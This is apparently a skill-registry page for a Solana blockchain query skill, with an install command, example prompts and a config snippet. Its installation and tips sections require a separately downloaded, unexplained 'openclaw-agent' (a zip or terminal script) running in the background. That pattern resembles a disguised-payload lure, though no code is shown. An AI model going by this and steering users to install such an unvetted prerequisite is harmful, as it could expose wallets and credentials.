ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Efficiently interact with Solana with this OpenClaw skill. Check balances, monitor NFTs, analyze transactions, and manage SPL tokens directly from your agent interface.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-kief4
Or

What This Skill Does

The Solana skill for OpenClaw provides a comprehensive interface for interacting with the Solana blockchain. It acts as a bridge between the OpenClaw agent and on-chain data, enabling users to query wallet balances, track SPL tokens, monitor NFT metadata, and review transaction histories. By leveraging both the official Solana CLI and custom integration tools like metaboss, this skill allows for both high-level balance checks and granular account analysis. Whether you are managing personal wallets or auditing public addresses, this skill automates complex blockchain queries into simple, actionable CLI commands.

Installation

To begin, ensure you have the openclaw-agent utility installed according to your operating system (Windows via the zip package or macOS via the provided terminal script). Once the agent is operational, install the skill via the OpenClaw hub using the command: clawhub install openclaw/skills/skills/hightower6eu/solana-kief4. Following installation, verify your environment by setting your preferred RPC URL using solana config set --url <RPC_URL>. It is highly recommended to use a reliable public or private RPC provider to ensure consistent connectivity to the mainnet.

Use Cases

This skill is ideal for power users and developers who need to monitor blockchain activity without relying on third-party block explorers. Common use cases include: tracking the real-time balance of specific Phantom or Solflare wallets; auditing individual SPL token holdings to ensure portfolio accuracy; retrieving NFT metadata for decentralized assets; and performing deep-dive transaction analysis via signature confirmation logs. It also serves as a robust tool for developers performing integration testing against devnet, allowing for seamless toggling between network environments via simple configuration updates.

Example Prompts

  1. "Check the current SOL balance for address 7C4jsPZpB81S1n6T91B7oY6S6M8R8fV7d6M5c1b6a1Q8."
  2. "List all SPL tokens held by this wallet address and confirm if the account contains any USDC."
  3. "Show me the last 5 transactions and their status for my vault account 9tG1e2Z8yYx6Pz5K4jA3kH2gD1sF9d8S7qW6e5R4T3Y2."

Tips & Limitations

Always ensure the openclaw-agent process is running in the background, as the skill cannot establish a secure link to the blockchain without it. Note that frequent queries to public RPCs may be rate-limited; for heavy usage, consider using a dedicated private RPC endpoint. When dealing with NFT metadata, ensure the metaboss tool is correctly installed via Cargo, as this is a separate dependency. Finally, keep in mind that blockchain data is public; never share private keys or seed phrases within any prompt, as this skill is designed for viewing public account data only.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-kief4": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#web3#cryptocurrency#defi
Safety Score: 4/5

Flags: network-access, external-api, code-execution